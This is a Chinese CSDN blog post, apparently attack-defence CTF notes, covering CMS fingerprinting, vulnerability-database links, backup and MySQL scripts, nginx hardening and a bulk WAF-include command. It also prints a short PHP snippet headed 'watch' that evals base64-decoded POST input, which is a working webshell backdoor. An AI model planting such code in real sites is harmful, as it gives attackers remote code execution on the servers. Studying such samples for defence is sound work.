判断是否是已知的CMS或者框架

已于 2024-01-19 15:08:45 修改
阅读量183 收藏
点赞数
文章标签: php 数据库 开发语言
于 2023-03-01 23:41:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dzqxwzoe/article/details/129292286
版权

判断是否是已知的CMS或者框架

搜索通用漏洞,打开kali进行搜索有没有通用的漏洞,搜索disscuz漏洞

searchsploit diss

复制

收集更多信息

Google、baidu已知的漏洞

验证查找常用的POC

  1. 判断是否为已知的CMS收集更多信息

  2. CMS类型

  3. CMS版本号

  4. 是否安装插件以及插件版本

  5. 补丁类型

收集更多信息,如WORDpress有无特殊配置,如他自己生成的版本号。

熟悉他使用的版本。

Google黑客技巧

POC

查看是否可以打出结果。

本地漏洞裤分享

http://www.bugscan.net/source/template/vulns/

复制

https://www.shentoushi.top/index.php/Go/?url=http://www.cnnvd.org.cn&LinkId=34

复制

https://www.seebug.org

复制

http://www.nsfocus.net/index.php?act=sec_bug

复制

https://www.shentoushi.top/index.php/Go/?url=http://www.0daybank.org&LinkId=44

复制

https://www.shentoushi.top/index.php/Go/?url=http://0day5.com&LinkId=43

复制

网站源码备份

远程获取文件scp -r Web1:/var/www/html/ webbak/

 #!/bin/bash
 time=`/bin/date +%F`
 bak_file="/data/backup/$time.tar.gz"
 webdir="/data/www/"
 tar zcvf $bak_file $webdir >/dev/null 2>&1 &

复制

/bin/bash /data/bak.sh定时执行计划任务 crontable -ectl+octl+x

数据库备份

mysqldump -uroot -p --single-transaction --all-databases > backup.sql # 所有
​
mysqldump -u root -p --single-transaction dataname > dataname.sql  #单个
​
mysqldump --skip-lock-tables -uxxxx -pxxxxxx -h 166.111.9.173 -R 数据库名 > ./urlevent20180319.sql 
​
​
mysqldump -h127.0.0.1 -uroot -ppassword database |gzip >$backupDir/$database-$today.sql.gz`然后,scp回来。
​
​
#备份目录
backupDir=/home/backup/database
#mysqlDump
mysqldump=/usr/local/mariadb/bin/mysqldump
host=127.0.0.1
username=root
password=42342342
today=`date +%Y%m%d`
#要备份的数据库数组
databases=(blog chinese_medicine)
# echo $databaseCount
for database in ${databases[@]}
  do
    echo '开始备份'$database
    $mysqldump -h$host -u$username -p$password $database | gzip > $backupDir/$database-$today.sql.gz
    echo '成功备份'$database'到'$backupDir/$database-$today.sql.gz
  done
​
​
恢复mysql
mysql -uroot -p TEST < bak.sql

复制

数据库运维

取消mysql密码认证:
修改my.cnf ,添加 skip-grant-tables
​
修改mysql密码
update mysql.user set password=PASSWORD('skyboy') where user='root' and host='localhost';
flush privileges;
​
最好先修改mysql,再修改php。一般不存在需要修改mysql密码的情况。
​
禁止数据库的远程连接:
​
use mysql;
​
update user set host='localhost' where user='root';
​
flush privileges;
​
CREATE USER ‘dog’@‘localhost’ IDENTIFIED BY ‘123456’;
​
GRANT ALL ON databasename.* TO ‘dog’@‘localhost
​
flush privileges;
​
调整站点配置文件,修改数据库连接的用户名和密码。

复制

Linxu服务器管理

对于非必须可写的目录:
权限设置为755,拥有者设为非www-data用户;从而防止文件被篡改/删除。 
​
对于必须可写的目录:
根据服务器类型,上一个.htaccess, 或者修改nginx的目录配置文件,去除此路径的脚本执行权限。
​
​
对于Nginx:
location ~ /mm/(data|uploads|templets)/*.(php)$ {
deny all;
}
location ~ .php$ {
try_files $uri /404.html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
} 
修改完成之后,nginx -S reload

复制

waf脚本

通用防御
​
php-WAF的批量添加:
​
find /var/www/html -type f -path "*.php" | xargs sed -i "s/<?php/<?php require_once('/tmp/waf.php');n/g“
​
WAF需要同时具备拦截和抓取流量的作用。

复制

watch

<?php
$serverList = array(
    "127.0.0.1",
    "::1"
);
$ip = $_SERVER['REMOTE_ADDR'];
​
foreach ($serverList as $host){
    if( $ip===$host){
    $a = $_POST['n985de9'];
    if(isset($a)) {
        eval(base64_decode($a));
    }
    }else{
        die();
    }
}

  网络安全入门学习路线

其实入门网络安全要学的东西不算多,也就是网络基础+操作系统+中间件+数据库,四个流程下来就差不多了。

1.网络安全法和了解电脑基础

其中包括操作系统Windows基础和Linux基础,标记语言HTML基础和代码JS基础,以及网络基础、数据库基础和虚拟机使用等...

别被这些看上去很多的东西给吓到了,其实都是很简单的基础知识,同学们看完基本上都能掌握。计算机专业的同学都应该接触了解过,这部分可以直接略过。没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。 当然你也可以看下面这个视频教程仅展示部分截图: 学到http和https抓包后能读懂它在说什么就行。

2.网络基础和编程语言

3.入手Web安全

web是对外开放的,自然成了的重点关照对象,有事没事就来入侵一波,你说不管能行吗! 想学好Web安全,咱首先得先弄清web是怎么搭建的,知道它的构造才能精准打击。所以web前端和web后端的知识多少要了解点,然后再学点python,起码得看懂部分代码吧。

最后网站开发知识多少也要了解点,不过别紧张,只是学习基础知识。

等你用几周的时间学完这些,基本上算是具备了入门合格渗透工程师的资格,记得上述的重点要重点关注哦! 再就是,要正式进入web安全领域,得学会web渗透,OWASP TOP 10等常见Web漏洞原理与利用方式需要掌握,像SQL注入/XSS跨站脚本攻击/Webshell木马编写/命令执行等。

这个过程并不枯燥,一边打怪刷级一边成长岂不美哉,每个攻击手段都能让你玩得不亦乐乎,而且总有更猥琐的方法等着你去实践。

学完web渗透还不算完,还得掌握相关系统层面漏洞,像ms17-010永恒之蓝等各种微软ms漏洞,所以要学习后渗透。可能到这里大家已经不知所云了,不过不要紧,等你学会了web渗透再来看会发现很简单。

其实学会了这几步,你就正式从新手小白晋升为入门学员了,真的不算难,你上你也行。

4.安全体系

不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。

所以想要成为一名合格的网络工程师,想要拿到安全公司的offer,还得再掌握更多的网络安全知识,能力再更上一层楼才行。即便以后进入企业,也需要学习很多新知识,不充实自己的技能就会被淘汰。

从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

尾言

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,最后联合CSDN整理了一套【282G】网络安全从入门到精通资料包,需要的小伙伴可以点击链接领取哦! 网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

程序员小强_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali工具正式篇 (第二章-4) 信息收集之CMS指纹识别
weixin_48617547的博客
06-21 2112
目录: 一、指纹识别 二、WAF 三、CDN 一:指纹识别 Q:什么是CMS和指纹识别? A:快速搭建网站的内容管理系统,快速二次开发的Web应用框架,例如网站、小程序。 Q:指纹的特性是什么? A:1.唯一性 2.终身不变性 3.方便性 Q:在线和离线的方式收集指纹信息有哪些? A:1、云悉在线: http://www.yunsee.cn 2、hatweb: http://www.whatweb.net 3、 插件:wappalyzer https://www.wappalyzer.com 4、 脚本:
判断是否能被已知且小于x的素数整除
03-30
适合初学者的代码学习,有助于帮助初学者了解C语言,帮助其更快入门。
判断网站cms方法
Swee
08-13 2438
今天有同事给了个域名让我判断这个是什么cms,判断完后记录一下cms的几种判断方法。 1.robots.txt文件 robots.txt文件我们写过爬虫的就知道,这个文件是告诉我们哪些目录是禁止爬取的。但是大部分的时候我们都能通过robots.txt文件来判断出cms的类型 如: 从wp路径可以看出这个是WordPress的cms 这个就比较明显了直接告诉我们是PageAdmin cms 也有些robots.txt里面写得不是很清楚。我们看看织梦的 从robots.txt不能直接看出来是什么cms,我
工作记录 信息收集之识别cms以及waf
m0_63581584的博客
03-03 197
一,在挖洞过程中识别框架,以及waf特别重要 1,探测框架以及cms 在线网站:云悉http://www.yunsee.cn/ whatweb https://whatweb.net/ 微步在线X情报社区-威胁情报查询_威胁分析平台_开放社区 在线指纹识别,在线cms识别小插件--在线工具 插件(需要我们安装在浏览器上):Wappalyzerhttps://www.wappalyzer.com/https://github.com/se55i0n/Webfinger 脚本:cmseek h...
实战辨别网站是用WordPress,织梦dedecms,Discuz那种程序做的
仿站、源码搭建/迁移技术博客
09-01 959
作为一个对网站有一定了解的入门猿友,你一定会想了解一个网站的构成,原理,如何制作等等,你是否和我一样,碰到一个好的网站,前端页面做的很好,网站总体都给人一种酷酷或者不一样的感觉,迫不及待的想了解它是用什么程序搭建的(现在80%的网站都是用别人写好的程序搭建的)。 织梦dedecms 判断网站是否使用的织梦cms内容管理程序 1、查看网站是否有织梦CMS的版权 2、一般织梦网站的robots文件都是织梦默认的,在网站首页URL后加robots.txt查看协议是否屏蔽了/plus的 3、在网站首页UR
C# 判断时间段是否相交的实现方法
08-29
这个方法可以生成一个Mongo查询,用于判断某个时间段是否已知时间段有交集。 C# 判断时间段是否相交的实现方法可以使用 TimeSpan 结构体和 LINQ 表达式来实现。这种方法可以应用于各种需要判断时间段是否相交的...
python 判断一组数据是否符合正态分布
09-24
- k-s 检验是一种非参数检验方法,用来判断样本数据是否来自某个已知的连续分布,如正态分布。在Python中,可以使用 `scipy.stats` 库的 `kstest` 函数进行检验。这个函数需要提供待检验的数据、分布类型(在这里设...
C++判断两圆是否相交并输出结果
04-24
(1)定义一个Point类,其属性包括点的坐标,提供计算两点之间距离的方法; (2)定义一个圆形类,其属性包括圆心和半径;...(3)创建两个圆形对象,提示用户输入圆心坐标和半径,判断两个圆是否相交,并输出结果。
php实现判断访问来路是否为搜索引擎机器人的方法
10-24
因此,我们可以通过检查这个变量来判断是否为搜索引擎机器人。 以下是一个简单的PHP实现示例: ```php class RobotDetector { private function getRobot() { if (empty($_SERVER['HTTP_USER_AGENT'])) { ...
渗透测试之网站cms识别大法汇总
白帽子九一
04-13 1万+
云悉相信大家都知道,但其库总有限。再给大家介绍kali自带的一款工具— whatweb 一、安装命令: apt-get insatll whatweb 二、用法: 1、扫描单个目标 whatweb www.xxx.com 2、扫描多个目标,并将结果保存在txt 新建xxx文件,输入多个目标地址,保存 whatweb -i xxx --log-brief=111.txt ......
信息收集-CMS识别
m0_37856131的博客
02-14 9170
信息收集-CMS识别
信息收集-服务器信息
最新发布
weixin_49349476的博客
05-23 1097
服务器上面可以运行大量的系统服务和第三方应用服务,如果操作系统或者第三方软件没有及时升级打补丁,攻击者就有可能直接通过服务器上运行的服务进行攻击。
渗透测试之指纹识别(CMS、CDN、WAF)
hmysn的博客
05-15 5532
目录 什么是指纹识别: 1、cms指纹识别 2、cdn指纹识别: 3、WAF指纹识别: 什么是指纹识别: 通过关键特征,识别出目标的CMS系统、服务器、开发语言、操作系统、CDN、WAF的类别 版本等等。 其中主要识别以下的信息: 1、CMS信息:比如Discuz、织梦、帝国CMSPHPCMS、ECshop等; 2、前端技术:比如HTML5、jquery、bootstrap、Vue、ace等; 3、开发语言:比如PHP、Java、Ruby、Python、C#等; 4、Web服务器:比
Kali Linux Web渗透测试手册(第二版) - 2.4 - 识别Web应用防火墙
weixin_30540691的博客
11-26 244
翻译来自:掣雷小组 成员信息: thr0cyte,Gr33k,花花,MrTools,R1ght0us,7089bAt, 这个公众号,一定要关注哦,慢慢会跟上面老哥们一起分享很多干货哦~~ 标记红色的部分为今日更新内容。 第二章:侦察 介绍 2.1、被动信息收集 2.2、使用Recon-ng收集信息 2.3、使用Nmap扫描和识别应用服务 2....
常见的判断网站cms方法
热门推荐
黑面狐
01-31 2万+
今天有同事给了个域名让我判断这个是什么cms,判断完后记录一下cms的几种判断方法。 1.robots.txt文件 robots.txt文件我们写过爬虫的就知道,这个文件是告诉我们哪些目录是禁止爬取的。但是大部分的时候我们都能通过robots.txt文件来判断出cms的类型 如: 从wp路径可以看出这个是WordPress的cms 这个就比较明显了直接告诉我们是PageAdmin
Kali Linux渗透基础知识整理(二)漏洞扫描
weixin_34054931的博客
07-31 942
Kali Linux渗透基础知识整理系列文章回顾 漏洞扫描 网络流量 Nmap Hping3 Nessus whatweb DirBuster joomscan WPScan 网络流量 网络流量就是网络上传输的数据量。 TCP协议 TCP是因特网中的传输层协议,使用三次握手协议建立连接。当主动方发出SYN连接请求后,等待对方回答SYN+ACK ,并最终对对...
渗透靶场--vulnstack-红队评估实战(3)
weixin_45794666的博客
07-20 1038
vulnstack-红队评估实战(3) 环境配置 攻击者: kali 192.168.154.129 web 192.168.154.135 192.168.93.100 pc 192.168.93.30 win2008 192.168.93.20 win2012 192.168.93.10 web1-ubantu 192.168.93.120 1.外网主机信息搜集 nmap扫描 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vGg14jbu-16267
在线cms识别|旁站|c段|信息泄露|cms漏洞扫描|端口扫描|
Pio
09-09 2059
工具 onlinetools Windows python3.7的版本是ok的,kali python3.8的版本还存在问题 可以尝试用3.7版本尝试 在线cms识别|旁站|c段|信息泄露|工控|系统|物联网安全|cms漏洞扫描|端口扫描 git clone https://github.com/iceyhexman/onlinetools.git cd onlinetools\ 因为我有python27和python37版本 python37 -m pip install -r requirements.
已知宽和高,怎么判断是否是菱形
03-24
判断一个图形是否是菱形,需要满足两个条件:四个角都是直角,相邻的两条边长度相等。所以,可以先判断是否是矩形,再判断对角线长度是否一致即可。具体实现方法如下: 1. 输入矩形的宽度和高度。 2. 判断是否是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值